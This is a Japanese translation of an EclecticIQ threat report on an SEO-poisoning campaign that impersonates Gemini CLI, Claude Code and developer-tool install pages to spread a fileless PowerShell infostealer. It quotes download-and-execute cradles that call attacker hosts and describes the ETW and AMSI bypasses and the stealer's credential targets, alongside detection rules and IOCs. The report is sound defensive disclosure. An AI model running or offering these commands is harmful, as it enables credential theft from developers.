SEO中毒キャンペーンがGeminiおよびClaude Code詐称を活用してinfostealerを配信

エグゼクティブサマリー

• 経済的利益を動機とするeクライムアクターは、AIプラットフォーム詐称による便乗的キャンペーンの拡大を続ける可能性が高い。これらのキャンペーンは企業にとって直接的なサプライチェーンリスクを生成するもので、脅威アクターはソフトウェア開発者向けツール（AIコーディングアシスタント、パッケージマネージャを含む）を標的にして開発者ワークステーションを侵害する。
• 2026年3月初旬、EclecticIQアナリストはGemini CLIおよびClaude Codeユーザーを標的とした進行中のinfostealer キャンペーンを特定しました。脅威アクターはSEO中毒を使用して、正規の結果の上に偽のドメインを表示させ、被害者を正規のAIエージェントインストールページに見せかける攻撃者制御インフラストラクチャに誘導しています。
• このinfostealerはWindows エンドポイントを標的とし、PowerShellを通じてメモリ内で完全に実行され、広範なアプリケーションから認証情報と機密データを収集してから、暗号化形式でコマンド・アンド・コントロールサーバに流出させます。
• 認証情報盗難の他に、マルウェアは任意のリモートコード実行機能を提供し、経済的利益を動機とするオペレーターはこれを活用して、選別された被害者に対するハンズオンキーボード侵入に移行し、侵害された環境内で対話的コードを実行します。
• これらの詐称ウェブサイトからのインストールは、OAuthトークン、CI/CD認証情報、企業VPN詳細、および機密ファイルの流出をもたらし、攻撃者に幅広いエンタープライズネットワークへの初期アクセスへの直接的な経路を与えています。
• このキャンペーンは、経済的利益を動機とする脅威アクターがAIプラットフォームの広範な企業採用を資本化して、infostealerマルウェアを配信していることを示しています。
• 2024年10月のRedLineおよびMETAに対するOperation Magnusを含む継続的な法執行機関の活動、および2025年5月のLummaC2インフラの破壊にもかかわらず、エンタープライズターゲットに対するinfostealer配置は近い将来も増加し続ける可能性が高い。低い運営コストと地下市場における盗まれた認証情報の継続的な需要がこの軌道を支えています。

タイポスクワット済みドメインがGeminiおよびClaude Codeインストールを詐称

Gemini CLI詐称キャンペーンは、独立した脅威研究者@g0njxaによって最初に公開で特定されました[1]。その初期発見により、このレポートで文書化されている分析とインフラストラクチャピボットが可能になりました。感染チェーンは、Gemini CLI[2]またはClaude Code[3]インストールページの公式バージョンを探している開発者によるGoogle検索で始まります。脅威アクターはSEO中毒を使用して、正規のソースの上の検索結果の上部に偽のドメインを表示させます。被害者はクリックして、正規の仕入先インストールガイドと見た目が一致する悪意あるページにアクセスし、インストールを完了するために単一のコマンドを実行するよう求められます。

図1 – Gemini CLIインストールページの詐称。

Gemini CLI詐称キャンペーンでは、被害者は偽のインストールページgeminicli[.]co[.]comに誘導されました。これは正規のインストール手順のように見えるものを表示します。このページは、ユーザーにPowerShellコマンドをターミナルにコピーして貼り付けるよう求めていますが、実行されると、このコマンドはgemini-setup[.]comに接続してinfostealerダウンローダーペイロード（Install.ps1）をダウンロードします。

図2 – infostealerダウンローダー配信に使用される悪意ある命令。

ダウンロードが完了すると、infostealerはevents[.]msft23[.]comでホストされているコマンド・アンド・コントロールサーバへの接続を確立します。これは侵害されたホストから流出したデータを受け取るために使用されるインフラストラクチャです。

図3 – infostealerの実行後のC2通信。

同じ脅威アクターはまた、ほぼ確実にAnthropicのClaude Codeユーザーを標的にしました。この評価は、同じマルウェアファミリーの使用、コマンド・アンド・コントロールサーバの構造、およびソーシャルエンジニアリング囮の一貫性に基づいています。

2026年3月30日、脅威アクターはClaude Code詐称用に2つの追加ドメインを登録しました。これはclaudecode[.]co[.]comおよびclaude-setup[.]comで、どちらもco[.]comサフィックスおよび-setup[.]com規約と同じ命名パターンを活用しています。脅威アクターはこのドメイン名選択を使用して、被害者ユーザーに対して正規に見えるようにしました。悪意あるドメインclaudecode[.]co[.]comはAnthropicの公式ドキュメントと視覚的に一致する複製されたインストールページをホストしており、ユーザーにツールを「インストール」するためのPowerShellコマンドを提示している一方で、claude-setup[.]comはダウンロードされた最終ペイロードをホストしています。

図4 – 2つのAIプラットフォーム詐称キャンペーン間のドメイン名の類似点。

実行後、infostealerマルウェアは流出したデータをevents[.]ms709[.]comに送信します。これはClaude Code詐称キャンペーンのC2サーバとして機能します。攻撃チェーンはGemini詐称キャンペーンで観測された動作を反映しており、ペイロードをステージングして配信するための同じテーマのドメイン規約の使用を含みます。この動作の重複は、同じ脅威アクターが両キャンペーンを担当していることの評価に対してアナリスト信頼度を高めます。

正規のAIツーリングインストレーションをファイルレスのPowerShell infostealerを隠すために武器化

マルウェア分析は、感染チェーンが偽のインストールページに埋め込まれた短い第1段階のPowerShellスクリプトで始まることを明かし、ペイロードを直接実行するのではなく2つの同時アクションを実行します：

図5 – ダウンローダーPowerShellスクリプト。

• サイレント ペイロード検索：スクリプトはShell.Application COMオブジェクトをインスタンス化し、ウィンドウスタイル0（非表示）でShellExecuteを呼び出してコンシールドPowerShellウィンドウを生成します。この非表示プロセスはirm events[.]msft23[.]com | iexコマンドを実行して、Invoke-RestMethodを介してメモリに直接第2段階infostealerペイロードをダウンロードし、ディスクに書き込まずに即座に実行するためにInvoke-Expressionに渡します。
• 正規Geminiインストール：並行して、同じスクリプトはnpm install -g @google/gemini-cliコマンドを実行し、GoogleのOfficial npmレジストリから本物のGemini CLIパッケージをインストールします。被害者はターミナルで実は完全に成功したインストールを見て、依存性解決、進捗バー、そして最後に機能するCLIバイナリを目にします。

実際のCLIは並行してstealerが実行されている間に完了し、ユーザーに正規に見えます。npmインストールが完了し、ユーザーがツールでの作業を開始する時間までに、infostealerはすでにそのデータ収集および流出サイクルを完了しています。

第2段階のPowerShellペイロードが実行されると、それはすぐにMicrosoft Windowsエンドポイント可視性を中立化するために2つのコア防御メカニズムを無効にすることに移動します：

図6 – 最終的なPowerShell infostealerがETWを無効化。

• Windows用イベントトレース(ETW)：スクリプトはPSEtwLogProvider.m_enabledフラグをパッチして、PowerShell固有のETWテレメトリを抑制し、ローカルロギングと転送されたイベント収集の両方が実行詳細をキャプチャするのを防ぎます。
• マルウェア対策スキャンインターフェース(AMSI)：バイパスはプロセス内スクリプトスキャンを無効にして、その後の難読化されたコンテンツがシグネチャベースまたはヒューリスティック検出をトリガーせずに実行できるようにします。

Microsoft Defenderのテレメトリ収集が中立化された後、スクリプトはネイティブで基本的に監視されていない環境で動作します。悪意あるPowerShellスクリプトは、収集、ステージング、流出のすべてをネイティブに実行します。これはおよそ6,800行のジャンクコードブランチで大量に難読化されており、仮想化された環境を検出する基本的なアンチサンドボックスゲートとして設計されたqemu-gaストリングチェックを含みます。

オペレーティングシステムとPowerShell コマンドレットが公開するレベルを超えた方法で相互作用するために、スクリプトはホスト質問のさまざまな側面をターゲットにするAdd-Type経由で実行時に3つの埋め込まれたC#タイプをロードします：

• CredHelper：WebサービスのRDPセッション、およびエンタープライズアプリケーション用に保存された認証情報を抽出するために、Windows Credential Managerに対してadvapi32.dllをP/InvokeしてCredEnumerateを呼び出します[4]。
• User32：EnumDisplaySettingsを呼び出して画面解像度をキャプチャします。これはホスト環境をプロファイルするために使用される一般的なフィンガープリント技術で、仮想マシンを識別するために使用されます。
• Rstrtmgr：Restart Manager APIをrstrtmgr.dllを通じて活用して、大規模に監視されているGet-Processコマンドレットを呼び出さずに実行中のプロセスを列挙し、オペレーターにホスト上のアクティブなセキュリティツール機能と生産性アプリケーションの即座のビューを提供します。

stealer の収集スコープは、エンタープライズユーザーと開発者ワークステーションに対する意図的な焦点を明かします。これはすべての検出されたブラウザプロファイルを反復処理し、Chromiumファミリーブラウザ、Chrome、Edge、およびBraveおよびFirefoxの別のハンドラー用の専用ルーチンを呼び出し、ログイン認証情報、セッションクッキー、自動入力データ、およびフォーム履歴を抽出します。ブラウザを超えて、スクリプトは企業環境で標準である協力およびコミュニケーションプラットフォームを直接標的にします：

• Slack：ローカルステートキーの抽出とネットワーククッキー
• Microsoft Teams：LocalAppDataの下のEBWebViewキャッシュクッキー、DPAPI保護ローカルステート復号化を伴う
• Discord：ローカルストレージLevelDB ファイルおよびローカルステート
• Mattermost：セッションクッキーおよびローカルステート
• Zoom：Zoom.us.iniから抽出されたDPAPI保護win_osencrypt_key
• Telegram Desktop：tdataセッションディレクトリ
• LiveChat、Notion、Zoho Mail Desktop：セッションクッキーとパーティション分割ストレージデータ

攻撃者にとって、これらのプラットフォームのいずれかからの有効なセッションクッキーまたはローカルステートキーは、内部チャネル、共有ファイル、クライアント通信、および接続統合を含む被害者のワークスペースに対する認証されたアクセスを許可します。このアクセスはパスワードとMFA要件を完全にバイパスして、盗まれたセッション資料を地下市場での即座の再販に対して高価値商品にしています。これはアクセスブローカー市場を給電してアカウント乗っ取りを大規模に可能にするデータです。

収集はさらにアクセストークン、クラウドストレージ、および機密ユーザーファイルに拡張します。スクリプトは以下を標的にしています：

• リモートアクセスツール：レジストリからのWinSCP保存パスワード(HKCU:\SOFTWARE\Martin Prikryl\WinSCP 2\)、PuTTY保存セッション(HKCU:\Software\SimonTatham\PuTTY\Sessions)、および埋め込まれたキー資料ならびにDPAPI保護ログインデータを含むOpenVPN設定ファイル。
• 暗号通貨ウォレット：Brave Wallet設定およびSpectreウォレットデータ。
• クラウドストレージ：Proton Drive、iCloud Drive、Google Drive、MEGA、およびOneDriveの局所的に同期されたディレクトリの列挙。
• ユーザーファイルおよびシステムメタデータ：Desktop、Documents、およびDownloadsx全体にわたる.txtおよび.docxファイルの再帰的リスティング；TranscodedWallpaperを介するデスクトップ壁紙キャプチャ；OSバージョン、インストールされたソフトウェア、ネットワークアダプタ設定、および実行プロセスのインベントリ。

SSHキーおよびVPN設定からクラウド同期ドキュメントへのデータ流出は、単一の侵害されたワークステーションでも個人および企業コンテキストの両方にわたる認証情報、セッショントークン、およびファイルをもたらすことを確保します。ターゲットされたすべてのソフトウェアおよびデータタイプの完全な分類は表1「Infostealerでターゲットされたソフトウェアおよびデータ」で提供されます。

infostealerサンプルはまた、オペレーターが感染したホストで任意の後続ペイロードを実行することができるコマンド・アンド・コントロール機能を含みます。ただし、PowerShellスクリプトに永続化メソッドは検出されません。

図7 –PowerShellスクリプトに埋め込まれた難読化を除去したC2サーバおよびステージングURLパス。

infostealerは3つのURLエンドポイント上でevents.msft23[.]comと通信します：

• /takeはサーバからの初期設定またはステージングデータをリクエストするために使用されます。
• /processは、流出したホストデータをアップロードし、同じHTTP応答でオペレーターのタスクリストを返すメインビーコンエンドポイントです。
• /validateはタスク実行を確認するか、ステータスをオペレーターに報告するために使用されます。

タスク発行フローは以下のように動作します：

• events.msft23[.]com/processにデータを流出した後、同じリクエストはレスポンス内のRSA暗号化タスクリストを返します。
• implantはそれを復号化し、レコードに分割し、各レコードのターゲットIDをローカル被害者ID（MachineGuidから派生）と照合します。
• マッチで、powershell.exe -command IEX(Invoke-WebRequest -UseBasicParsing ‘<url>’)を介してオペレーター提供URLを実行するためにShell.Application.ShellExecuteを通じて実行します。
• 二次的パスは名前付きパイプを使用して子プロセスで任意のPowerShellを実行し、その出力を親に戻すキャプチャします。

単一のbulletproof ホストからのパッシブDNS ピボットを通じた幅広いキャンペーンのマッピング

EclecticIQアナリストはパッシブDNSレコードを使用し、109.107.170[.]111でホストされているclaude-code.co[.]comドメインからピボットしました。これはネットランド ベースのbulletproof ホスティングプロバイダーMIRhosting[5]に割り当てられたIPアドレスです。このピボットは、Node.jsおよびChocolateyパッケージマネージャ、オープンソースパスワードマネージャーKeePassXC、暗号通貨Monero、および他の開発者生産性ツールを詐称するように設計された、30を超えるドメインを持つより大きなマルウェアインフラストラクチャクラスターを明かし、より可能性の高い調整キャンペーンを公開しました。

図8 – AIの詐称キャンペーンからピボットされたドメイン。

このなりすましキャンペーンは、アメリカ合衆国およびイギリスのユーザーをターゲットとするために地理的にカスタマイズされている可能性が高く、これは攻撃者制御ドメイン内の一部で.co.uk、.us.com、および.us.orgトップレベルドメインの選択によって証拠をされています。

Monero囮の包含は、暗号盗難と開発者環境の侵害を組み合わせた多面的な目的を示しています。2026年3月下旬から4月初旬の間のこれらのドメイン登録の迅速さは、可能性の高いアクティブなキャンペーンを示唆しています。

このピボットされたクラスターからの1つの例はnodejs-setup.co[.]comで、公式Node.jsインストールページを詐称するドメインです。正規のNode.jsインストーラーを提供する代わりに、ページは訪問者に次のPowerShellコマンドを実行するように指示しています：

• “powershell.exe” -c “irm https://community.chocolatey.net/install.ps1|iex”

図9 – Node.jsパッケージマネージャーのなりすまし。

偽のNode.jsインストールページを使用した囮は、Chocolateyをインストール方法として意図的に呼び出しており、これは計算された選択です。正規のNode.jsインストールは実際にChocolateyベースのセットアップをサポートしているためです。ワンライナーPowerShellスクリプトはChocolateyの公式インフラストラクチャを詐称するドメインcommunity.chocolatey[.]netを参照し、単一のソーシャルエンジニアリングフローに2つの詐称ドメインをスタッキングし、正当な開発者ワークフローを密接に反映しています。

技術は開発者およびITアドミニストレーターの習慣に対してカスタマイズされており、定期的にパッケージマネージャーウェブサイトから厳密な検査なしにワンラインPowerShellインストーラーを貼り付けています。実行チェーンは最終的に、このレポートで前に文書化されたのと同じファイルレスPowerShell infostealerを提供します。唯一の有意な変更がevents.msft23[.]comからevents.ms709[.]comへのコマンド・アンド・コントロール エンドポイントの回転です。

両C2ドメインは同じ構造パターンに従っており、「events.」サブドメインが短い、ブランド隣接ルートとペアリングされており、緩くMicrosoft を連想させます。これは、オペレーターが単一のツーリングおよびインフラストラクチャテンプレートを再利用しており、囮ブランドおよびC2ホスト名のみ回転させながら、基礎的なimplantおよび命名ロジックを損なわずに保たれていることを示しています。

このキャンペーン全体を通じて、脅威アクターは開発者の動作の理解を示し、AI コーディングプラットフォームの現在のハイプを利用します。これらの攻撃パターンは開発者およびITアドミニストレーターを非常に可能性の高いターゲットです。Node.js、Chocolatey、およびKeePassXCを含むルーチン開発者ワークフローに埋め込まれたブランドをなりすまして、アクターは開発者ツーリングに対する信頼を武器化して、ルーチンソフトウェア採用を初期アクセスベクトルに変えました。

このターゲット設定アプローチは今後数ヶ月にわたって非常に可能性の高い継続および拡大を続けるでしょう。開発者は通常、エンタープライズネットワーク、ソースコードリポジトリ、およびソフトウェアサプライチェーン全体を通じて権限の昇格を保有しています。経済的利益を動機とするeクライムアクターは、開発者重点のキャンペーンを非常に可能性の高い継続優先順位付けし、単一の侵害された開発者エンドポイントは不均衡なアクセスをもたらし、幅広いエンタープライズ環境に対して高影響の侵入を可能にできます。

検出および防止の機会

検出の機会

• コマンドラインテレメトリでirm | iexダウンロードクレードルパターンを探索してください。Invoke-RestMethod、Invoke-Expression、またはエイリアスirmおよびiexを一緒にチェーンするProcessコマンドラインを含むものは、ファイルレス実行の高忠実度インジケーターです。
• powershell.exeが-WindowStyle Hiddenで生成されたか、ウィンドウスタイル0でShell.Application.ShellExecuteを通じてインスタンス化されたことに対して警告してください。これは第1段階スクリプトで使用される非表示実行パターンです。
• PowerShellセッションからのAdvapi32.dll!CredEnumerateへのP/Invoke呼び出しに続く追加タイプを探索してください。これはstealerの認証情報マネージャーダンプ動作です。

• .co.comの第2レベルドメインへのトラフィックをブロックまたは警告してください。特に、FQDNが開発者ブランド（例：*-setup.com、*-cli.co.com、nodejs-*、claude-*、gemini-*）を反映している場合。
• C2ビーコンパターンを検出してください：/take、/process、/validateへのURIパスとPowerShell User-Agentストリングを使用するHTTPリクエスト。

• explorer.exeまたはcmd.exeからのpowershell.exeスポーニングを5秒以内の送信HTTP/HTTPS接続と相関させてください。これは貼り付けと実行の初期アクセスをキャッチします。

防止の機会

• WDACまたはAppLockerを介して標準開発者ワークステーションでPowerShell制約言語モード(CLM)を実行してください。これはstealerによって使用されるAdd-Type、リフレクション、およびほとんどのP/Invoke ベースの認証情報盗難をブロックします。
• FIDOキーを使用して、高い特権ユーザーアカウントをターゲットとしているアイデンティティベースの攻撃チェーンを最小化してください。
• インターネットからダウンロードされたスクリプトを実行してからPowerShellを防ぐAppLockerまたはWDAC ルールを展開してください（Mark-of-the-Web施行）。
• ブラウザポリシーを設定して、実行可能な範囲でクリップボード書き込みアクセスを信頼されていないサイトに無効化してください。ClickFixスタイルの貼り付けと実行のクレードル を緩和してください。

• 盗まれたセッションクッキーのリプレイ値を制限するために、開発者層アカウントに対する条件付きアクセスを伴う短命OAuthトークン強制刷新を実行してください。

• このソーシャルエンジニアリングキャンペーンについての開発者固有のガイダンスのためのユーザー認識を作成してください。

IOC

攻撃者制御ドメイン：

api[.]bio9438[.]com
claudecode-install[.]co[.]com
openclow[.]co[.]com
geninicli[.]co[.]com
keepassxc[.]us[.]org
claude-code[.]co[.]com
chocolatey[.]net
claudecode[.]co[.]com
chocolatey-setup[.]co[.]com
get-monero[.]co[.]uk
getmonero[.]us[.]com
metrics[.]msft17[.]com
claude-setup[.]com
keepassxc[.]us[.]com
olive3451[.]com
events[.]ms709[.]com
chocolatey-download[.]co[.]com
chocolatey[.]co[.]com

SHA 256ファイルハッシュ：

• ff81cb9263fcde5870a0748fd6af2d30a4ba864415c15ca14827d0dd723eb60c
• 9c87e8162b39fbb773c416006b16f8e34aca53372d1b2d4a584df0ffc69ad333
• 89d634c8471382ff9c6fd966008ad5c376d7a0edae8f799eb569837170f2373d
• be2ff065a232a3a6f187f9fb03a6c1b368dff3d2ba0966777b1f5503aa5ecd16
• a1c5e1d9bdc1a931c11ac6fdfdff1fbc69ff88521cf443cb174f9720a05fe72d
• bb78f024c4d8b5a6a128aacb498acad025a234a6b25fde36ff2e14601134555f
• a6525b37b0cc5339df375e17a0c10772b50c9d425001b0c3a9dada995c7f62dd
• b37ee243518221017bab0eb4b54b5431571cc21e54113698ce49a89b89993754
• aa350580ae5ea46544ffa15c324ab4225dff0dcc5842ac5ca8e2dc4018e5ffad
• 65e1a542bb7d995cc4aa6c71191da125f14f99ca03da7266f5b071440d6d229a
• 64d2a9a49e27d89f1b3489d7db29c3a3a12b4b090f59c24b694c239cb55db262
• 2d7a94e4a0fedcf31cdd43b06222add9d1888fecb2c5488afc658d08c3f40116
• 5c6a2c73f59fd8defbf118f87e5c88ba62e3067f8e8c0ed104f3f188fa0d959d
• de34f2f93b74e049a08074c779a863a87a85a403594b8e220b1fba15112e6386
• 0e8c45d847f57095d9879c0da764ab02431db4d5d85f50c4fd5ba38353b79eed
• dfd21a363f4994794f821d76ca61c834882a51b5c6f7b95627b70789462149e3
• a31ae1eef3261c36b465255e624fb7ac5899bf2a9823564ba792fac8346723aa
• 1439d30ebeac3a6ccb9545acaa350783a83cc08746cb575e59ddb0efc77d412a
• 7c2a9ad5fcf489d1844f51830242f6dd9dfc203be6de3ceb07a4f6dd21c9f1a3
• 80ffc86673bd8c8bd5862bbe961323a822b23c94df48c685162c571445552faa
• c416052c8ac6bfb78b7f0c46c568c528ead33501149661f1d9ecb1861269f8fa
• efbf87447d93f4232b1169920f75c2066d19863ebc28fb2d2662353dc4ef61d8
• 2d9ecc9321994558d0cc0e9d3fa9fdf600bacfe8758976d34f26f89c33bd5007
• ae9bc11adb457930d402844bd3bf3af8ea7c13fdb7ea269fbe73877b18af1ca8
• c213ce07b5791abd334ff749b5f05ecc6b40772d35ef4388b5f576bc3e619765
• 27e17661f5573f63b65e3a5cfe5bdca75acdc1911441b032781f7ebe125d9194
• ae8f70dad97fedecd707977ca22fd6f656c64c0dac96e03f0f4a6c04d0693f59
• c47610c9df3fb101b0e99f2ac12589db653464edf12cebaa2c67fd33fc7715f3
• 5071921cb1ca369fe8f7af522a00373c8c85e4357f7ea1879d2cb4ae791797d6

表1 – infostealerでターゲットされたソフトウェアおよびデータ

翻訳元: https://blog.eclecticiq.com/seo-poisoning-campaign-leverages-gemini-and-claude-code-impersonation-to-deliver-infostealer